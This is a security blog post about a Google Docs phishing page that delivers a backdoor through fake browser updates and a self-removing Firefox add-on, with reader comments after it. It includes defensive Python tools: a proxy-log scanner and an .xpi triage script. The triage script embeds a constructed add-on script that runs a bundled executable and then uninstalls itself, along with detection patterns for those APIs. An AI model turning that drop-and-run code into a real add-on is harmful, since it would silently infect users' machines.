This Phishing Page Can Do More Than Just Steal Your Credentials

[Update April 4, 2014 9:21AM PDT] Our friends at PhishLabs recorded and posted a video of a fake Google Drive and Docs phishing scam in action. Check out their post here.

Original story:

Every now and again, we read reports about phishing sites that look dangerously convincing—you can hardly tell the real one apart from the fake one anymore, unless you know what to look for and where. Our friends at Symantec found one such site some time in March.

What makes their find interesting is that the scam page was hosted on Google's own servers and served over https, so the address bar looked exactly as a genuine Google URL normally does. That made the phish almost impossible to spot for anyone trying to reach their Google Docs or Google Drive account.

There are several fake Google sites out there that may not look as compelling and sophisticated as the Symantec find, but I have no doubt that these sites would have their share of victims, too.

Sample of a Google Docs phishing page in the wild

Our research has led us to a fresh Google login clone with the same interesting bits mentioned above. This page, however, is not content with stealing credentials: it also pushes a malicious payload onto the visitor's machine.

Users of our products are protected from this web threat, as Malwarebytes Anti-Malware already detects asdf.exe and its duplicates as Backdoor.Bot. The executable has a VirusTotal detection rate of 16/51 as of this writing.

The phishing page contains code that identifies the visitor's browser. It then pops up an overlay telling the user that a set-up file must be downloaded to update the browser (and, presumably, its "outdated plug-ins"). No browser delivers its updates this way: Chrome and Firefox update themselves through their own updaters and Internet Explorer through Windows Update, never through a download prompted by a third-party web page.

We observed that the overlay appears only in selected browsers, namely Internet Explorer, Chrome, and Firefox. As you may recall, these are the three most used browsers worldwide.

Phish page accessed via IE (click to enlarge)

Phish page accessed via Chrome (click to enlarge)

Phish page accessed via Firefox (click to enlarge)

Once Chrome and IE users click "Accept and Install", Chrome_Plug-in_EN-US_WOL_WIN.exe and Internet_Explorer_EN-US_WOL_WIN.exe, respectively, are downloaded onto their machines. The two files are identical copies of one another; only the name is tailored to the browser.

For Firefox users the scenario differs: instead of an executable, they are asked to download a browser add-on named addon.xpi from a publicly accessible Dropbox folder.
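To turn the behaviour described above (a browser-specific lure, with the payload names quoted in this post) into something a defender can run, here is an added example that is not part of the original post: a small Python scanner over web proxy log lines that flags the three known payload names and, more generally, any executable or add-on download whose filename poses as a browser update but comes from a host other than the browser vendor's. The log lines, the host names (phish.example, dropbox.example, cdn.example), the client addresses and the vendor-host allowlist are all constructed for the example; only the three payload filenames come from the post.

```python
"""Flag browser-update lures in proxy logs. Added example, not code from the post."""
from urllib.parse import urlsplit

# The three payload filenames reported in the post, keyed lower-case,
# with the browser each lure is aimed at.
KNOWN_PAYLOADS = {
    "chrome_plug-in_en-us_wol_win.exe": "Chrome",
    "internet_explorer_en-us_wol_win.exe": "Internet Explorer",
    "addon.xpi": "Firefox",
}

# Assumption: hosts from which the vendors themselves ship browser installers.
# Adjust for your environment; nothing in this set comes from the post.
VENDOR_HOSTS = {"dl.google.com", "download.mozilla.org", "download.microsoft.com"}

# Words a "your browser is out of date" lure tends to put in the filename.
LURE_WORDS = ("chrome", "explorer", "firefox", "plug-in", "plugin", "update", "setup")
BINARY_EXT = (".exe", ".msi", ".xpi")


def browser_from_ua(ua):
    """Coarse browser family from a User-Agent string.
    Chrome is tested before Safari because Chrome UAs also contain 'Safari/'."""
    if "Firefox/" in ua:
        return "Firefox"
    if "Chrome/" in ua:
        return "Chrome"
    if "MSIE " in ua or "Trident/" in ua:
        return "Internet Explorer"
    if "Safari/" in ua:
        return "Safari"
    return "Other"


def classify(url):
    """Return a reason string when the download looks like a lure, else None."""
    parts = urlsplit(url)
    name = parts.path.rsplit("/", 1)[-1].lower()
    if name in KNOWN_PAYLOADS:
        return "known payload name (%s lure)" % KNOWN_PAYLOADS[name]
    if parts.hostname in VENDOR_HOSTS:
        return None  # vendor-hosted installer: expected traffic
    if name.endswith(BINARY_EXT) and any(w in name for w in LURE_WORDS):
        return "browser update lure from non-vendor host"
    return None


def scan(lines):
    """Parse tab-separated lines (ts, client, method, url, status, user-agent)
    and return one alert dict per suspicious download, in log order."""
    alerts = []
    for line in lines:
        ts, client, _method, url, _status, ua = line.rstrip("\n").split("\t")
        reason = classify(url)
        if reason:
            alerts.append({"ts": ts, "client": client, "url": url,
                           "browser": browser_from_ua(ua), "reason": reason})
    return alerts


# Constructed sample log: hosts, clients and timestamps are placeholders.
UA_CHROME = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36"
UA_IE = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
UA_FF = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
UA_SAFARI = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14"

SAMPLE_LOG = [
    "2014-03-28T10:01:02\t10.0.0.5\tGET\thttp://phish.example/Chrome_Plug-in_EN-US_WOL_WIN.exe\t200\t" + UA_CHROME,
    "2014-03-28T10:03:41\t10.0.0.7\tGET\thttp://phish.example/Internet_Explorer_EN-US_WOL_WIN.exe\t200\t" + UA_IE,
    "2014-03-28T10:05:19\t10.0.0.9\tGET\thttps://dropbox.example/s/a1b2c3/addon.xpi\t200\t" + UA_FF,
    "2014-03-28T10:06:00\t10.0.0.5\tGET\thttps://dl.google.com/chrome/install/ChromeSetup.exe\t200\t" + UA_CHROME,
    "2014-03-28T10:07:30\t10.0.0.11\tGET\thttps://phish.example/images/logo.png\t200\t" + UA_SAFARI,
    "2014-03-28T10:09:12\t10.0.0.9\tGET\thttp://cdn.example/Firefox_Update_Setup.exe\t200\t" + UA_FF,
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(a["ts"], a["client"], a["browser"], a["reason"], a["url"])
```

Run against the constructed log, the scanner raises four alerts: the three named payloads and the generic Firefox "update" lure, while the Chrome installer fetched from the vendor host and the image download pass through. The vendor allowlist is the part to tune: anything a browser-update lure can be served from that is not on it will be flagged, which is the intended bias.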

Phish page wants you to install a malicious Firefox add-on
(click to enlarge)

An .xpi is an ordinary ZIP archive, so it can be unpacked with any archive tool. Once expanded, this one contains the executable asdf.exe, yet another copy of the IE/Chrome download. A JavaScript file bundled in the package launches the executable while the add-on is being installed.

Finally, the extension uninstalls itself from Firefox, restoring the browser to the state it was in before the user met the phishing page. By then, however, the system is already infected, without the user noticing anything.
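As an added example (not the post's own tooling, and not the sample's actual code), here is the triage step an analyst would take on such an add-on: unpack the .xpi as a ZIP, hash anything that starts with the PE "MZ" header, and grep the bundled JavaScript for the privileged add-on APIs that can spawn a process and remove the add-on. The post does not name which APIs the real add-on used; the patterns below match the standard legacy Firefox add-on APIs of the time (nsIProcess, FileUtils, AddonManager) and are an assumption. The sample .xpi built in the script is constructed for the test: its bootstrap.js is a stand-in written for this example and its asdf.exe is a 66-byte stub carrying only the MZ magic.

```python
"""Triage a Firefox .xpi for a drop-and-run payload. Added example, not from the post."""
import hashlib
import io
import re
import zipfile

PE_MAGIC = b"MZ"  # DOS/PE header magic; good enough to spot a Windows executable

# Assumption: the legacy privileged-add-on APIs a script would use to launch a
# bundled file and to uninstall itself. The post does not say which ones the
# real add-on called.
SUSPECT_JS = {
    "process_launch": re.compile(r"nsIProcess|@mozilla\.org/process/util;1"),
    "file_access": re.compile(r"nsIFile|nsILocalFile|FileUtils"),
    "self_uninstall": re.compile(r"AddonManager|\.uninstall\s*\("),
}


def triage_xpi(data):
    """Walk every entry of the archive; return executables found, JS API hits
    per script, and a verdict derived from the two together."""
    report = {"entries": [], "executables": [], "js_findings": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            blob = z.read(info.filename)
            report["entries"].append(info.filename)
            if blob[:2] == PE_MAGIC:
                report["executables"].append({
                    "name": info.filename,
                    "size": len(blob),
                    "sha256": hashlib.sha256(blob).hexdigest(),
                })
            if info.filename.lower().endswith(".js"):
                text = blob.decode("utf-8", "replace")
                hits = [k for k, rx in SUSPECT_JS.items() if rx.search(text)]
                if hits:
                    report["js_findings"][info.filename] = hits
    launches = any("process_launch" in h for h in report["js_findings"].values())
    if report["executables"] and launches:
        report["verdict"] = "drop-and-run add-on"
    elif report["executables"] or report["js_findings"]:
        report["verdict"] = "needs manual review"
    else:
        report["verdict"] = "no indicators"
    return report


# --- constructed sample archive (stand-in, not the real sample) ---------------
INSTALL_RDF = """<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:id>addon@example.invalid</em:id>
    <em:bootstrap>true</em:bootstrap>
  </Description>
</RDF>"""

# Stand-in bootstrap script: runs a bundled file at startup, then uninstalls itself.
MALICIOUS_JS = r"""
Components.utils.import("resource://gre/modules/AddonManager.jsm");
Components.utils.import("resource://gre/modules/FileUtils.jsm");
function startup(data, reason) {
  var exe = FileUtils.getFile("ProfD", ["extensions", data.id, "asdf.exe"]);
  var proc = Components.classes["@mozilla.org/process/util;1"]
                       .createInstance(Components.interfaces.nsIProcess);
  proc.init(exe);
  proc.run(false, [], 0);
  AddonManager.getAddonByID(data.id, function (addon) { addon.uninstall(); });
}
function shutdown(data, reason) {}
"""
BENIGN_JS = "function startup(data, reason) {}\nfunction shutdown(data, reason) {}\n"


def build_sample_xpi(malicious=True):
    """Assemble an in-memory .xpi; the 'exe' is a 66-byte stub with only the MZ magic."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("install.rdf", INSTALL_RDF)
        z.writestr("bootstrap.js", MALICIOUS_JS if malicious else BENIGN_JS)
        if malicious:
            z.writestr("asdf.exe", PE_MAGIC + bytes(64))
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        rep = triage_xpi(build_sample_xpi(malicious=flag))
        print(rep["verdict"], rep["entries"], rep["js_findings"], rep["executables"])
```

The verdict deliberately requires both a PE file and a process-launch API in the same package; an add-on that only ships a binary, or only touches those APIs, lands in "needs manual review" rather than being called clean. On a real sample the sha256 values are what you would pivot on next.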

Although we could not reproduce the payload download with Safari, Opera, or other browsers, we urge their users to keep their guard up as well.

The phishing page can and will fool users into thinking they are logging on to their Google Drive account if they are not careful. Seeing https in the address bar is no longer enough to trust a page: the padlock only tells you that the connection to the server is encrypted, and a phishing page hosted on a legitimate provider's servers gets that provider's perfectly valid certificate. Check the full domain name in the address bar, not just the scheme.

Phish page accessed via Safari (click to enlarge)

Eyes open, everyone.

Jovi Umawing

pegleghorace

I am interested as to why you have blacked out the names of the fake Google phishing sites in the article above. Surely exposing them publicly would add yet another layer of protection from them?

Herman Morgan

Thanks for the great explanation of how the Google Docs scam worked. I have encountered a couple of the "Update Required" scams as well. The one I want to mention is an apparent "Update" for 'Windows Media Player', which two of my friends clicked on at some 'adult' sites, resulting in a virus that I couldn't isolate or block with my IOLO System Shield, couldn't find, nor could the anti-malware app I used (not Malwarebytes, which is great). Anyway, I ended up sweeping both those drives to defeat that **** bug, so I thought I'd share that with our friends.

I think I got almost the same case, but instead of installing add-ons, every time I open some website (Google, Facebook, Bing, Yahoo, and some more) I get a warning about an outdated browser and/or Flash Player, then the web page sends me to a download page to download malicious software. I've scanned my whole laptop with Bitdefender and Malwarebytes and both of them tell me that my laptop is clean. How can I fix it?